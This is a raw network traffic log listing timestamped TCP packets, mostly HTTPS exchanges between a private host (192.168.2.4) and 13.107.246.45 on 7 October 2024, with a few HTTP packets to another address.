Oct 7, 2024 18:47:11.826452017 CEST	443	49767	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.827558994 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.827580929 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.827600002 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.827605009 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.848009109 CEST	49767	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.848026037 CEST	443	49767	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.849008083 CEST	49767	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.849014044 CEST	443	49767	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.915703058 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.915891886 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.915927887 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.916629076 CEST	443	49766	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.916799068 CEST	443	49766	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.917134047 CEST	49766	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.917179108 CEST	49766	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.917202950 CEST	443	49766	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.917236090 CEST	49766	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.917242050 CEST	443	49766	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.920452118 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:11.920458078 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.922005892 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:11.975902081 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.000020027 CEST	443	49767	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.000185966 CEST	443	49767	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.000488997 CEST	49767	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.000488997 CEST	49767	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.000709057 CEST	49767	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.000746965 CEST	443	49767	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.004635096 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.004806042 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.007210016 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.047395945 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.094096899 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.100791931 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.100822926 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.103024006 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.147407055 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.181057930 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.184885979 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.184904099 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.194185019 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.197115898 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.239396095 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.274498940 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.278151035 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.278172016 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.289936066 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.295716047 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.339421988 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.365247965 CEST	443	49770	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.365340948 CEST	49770	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.367187977 CEST	49770	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.367196083 CEST	443	49770	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.367543936 CEST	443	49770	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.367615938 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.369020939 CEST	49770	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.370912075 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.370923042 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.384578943 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.387259007 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.415400028 CEST	443	49770	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.427398920 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.458795071 CEST	443	49765	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.459368944 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.459717035 CEST	443	49765	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.459801912 CEST	49765	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.459903955 CEST	49765	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.459954023 CEST	443	49765	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.459999084 CEST	49765	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.460016966 CEST	443	49765	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.461662054 CEST	443	49770	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.461740017 CEST	443	49770	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.461801052 CEST	49770	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.462178946 CEST	49770	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.462196112 CEST	443	49770	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.462204933 CEST	49770	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.462210894 CEST	443	49770	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.462969065 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.462977886 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.463819981 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.463830948 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.464329004 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.464338064 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.475672960 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.477509022 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.519424915 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.551740885 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.555311918 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.555366039 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.556385994 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.558676958 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.559092045 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.561002970 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.561017036 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.563879967 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.607415915 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.640151024 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.643923044 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.643968105 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.654072046 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.656575918 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.658056021 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.660422087 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.660434961 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.662648916 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.662699938 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.662733078 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.815790892 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.819322109 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.859401941 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.876893997 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.880275011 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.880306005 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.883234024 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.927406073 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.982714891 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.985939980 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.985996008 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:12.986037016 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:12.986078024 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.021126032 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.021214008 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.024260044 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.024499893 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.024519920 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.025296926 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.071402073 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.083663940 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.086179018 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.086232901 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.104245901 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.106652021 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.147419930 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.175638914 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.177736998 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.177783966 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.181015968 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.183830976 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.183849096 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.185684919 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.195365906 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.197597980 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.239420891 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.511069059 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.511991024 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.512058973 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.512073994 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.515317917 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.515331984 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.515678883 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.517885923 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.517906904 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.518518925 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.519018888 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.519036055 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.635052919 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.638286114 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.656999111 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.657151937 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.657210112 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.657228947 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.660007000 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.660022974 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.660461903 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.660540104 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.660556078 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.662483931 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.701400042 CEST	49723	80	192.168.2.4	2.16.100.168
Oct 7, 2024 18:47:13.703399897 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.707156897 CEST	80	49723	2.16.100.168	192.168.2.4
Oct 7, 2024 18:47:13.707269907 CEST	49723	80	192.168.2.4	2.16.100.168
Oct 7, 2024 18:47:13.745275021 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.747883081 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.747908115 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.794127941 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.796168089 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.796190023 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.798135042 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.850871086 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.850895882 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.855469942 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.855560064 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.855573893 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.856462002 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.880896091 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.883337021 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.927424908 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.947926044 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.951816082 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.951843023 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.969535112 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.972353935 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.973632097 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.976577044 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:13.976609945 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:13.979207993 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:14.019397974 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.061671972 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.069843054 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:14.069891930 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.135035038 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.141423941 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:14.141443968 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.143731117 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:14.187423944 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.200448036 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.204273939 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:14.204288960 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.206533909 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:14.247415066 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.281161070 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.335201025 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:14.335222960 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.338890076 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:14.338946104 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.367877960 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.367921114 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.368004084 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:14.368026018 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.371284008 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:14.371334076 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:14.371361971 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.407485008 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.409490108 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:14.409856081 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:14.409868002 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.452676058 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.454962969 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:14.495403051 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.770638943 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.770798922 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.771691084 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:14.771708012 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.774661064 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:14.774671078 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.774719954 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:14.774724007 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.775568008 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:14.775572062 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.775614023 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:14.775616884 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.857628107 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.860311985 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:14.860326052 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.869189978 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.870934010 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:14.872242928 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.913373947 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:14.913394928 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.915524960 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:14.949561119 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.952199936 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:14.952409029 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:14.952450037 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.954833031 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:14.956600904 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.003417015 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.007414103 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.009319067 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.009335995 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.038815022 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.040635109 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.083420038 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.091619968 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.094414949 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.094443083 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.094690084 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.129709005 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.129793882 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.129807949 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.132124901 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.132225037 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.132256985 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.132491112 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.175401926 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.177786112 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.179755926 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.179773092 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.227349997 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.232341051 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.232357025 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.269139051 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.270400047 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.270574093 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.270581961 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.276957989 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.281600952 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.281640053 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.283307076 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.327402115 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.353583097 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.356439114 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.356470108 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.413470030 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.416342974 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.416372061 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.416733027 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.459445000 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.459510088 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.459532022 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.463293076 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.463392973 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.463409901 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.464076042 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.507405043 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.548959970 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.551625013 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.551660061 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.591551065 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.594202042 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.594225883 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.668662071 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.674937010 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.674972057 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.676691055 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.693042040 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.696460009 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.739420891 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.778361082 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.782306910 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.782330990 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.782648087 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.785203934 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.821609020 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.823919058 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.823928118 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.825917959 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.861043930 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.863291979 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.877695084 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.879676104 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.905503035 CEST	443	49769	13.107.246.45	192.168.2.4
